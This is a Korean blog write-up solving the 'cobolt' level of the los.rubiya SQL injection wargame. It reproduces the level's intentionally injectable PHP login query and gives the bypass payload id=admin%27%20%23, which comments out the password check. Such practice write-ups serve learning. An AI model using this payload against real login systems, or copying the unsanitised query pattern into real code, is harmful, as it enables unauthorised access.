Iriton's log

[los.rubiya] cobolt write-up 본문

WebHacking/WarGame

[los.rubiya] cobolt write-up

Iriton 2023. 10. 10. 10:02

query :

select id from prob_cobolt where id='' and pw=md5('')


<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id'] == 'admin') solve("cobolt");
  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";
  highlight_file(__FILE__);
?>

id가 admin이어야 한다.

이외의 조건은 없다.

admin을 넣고 뒤에 주석처리를 하자.

id에 admin’ #을 넣으면

id = ‘admin’ 이 되고 뒤에 pw는 주석처리 된다.

#은 %23이니 직접 입력해 준다.

 

id=admin%27%20%23

'WebHacking > WarGame' 카테고리의 다른 글

[los.rubiya] orc write-up  (0) 2023.10.10
[los.rubiya] goblin write-up  (0) 2023.10.10
[los.rubiya] gremlin write-up  (0) 2023.10.04
[root-me] Challenge: Install files  (0) 2023.10.04
[root-me] Challenge: File upload - Double extensions  (0) 2023.10.04
Comments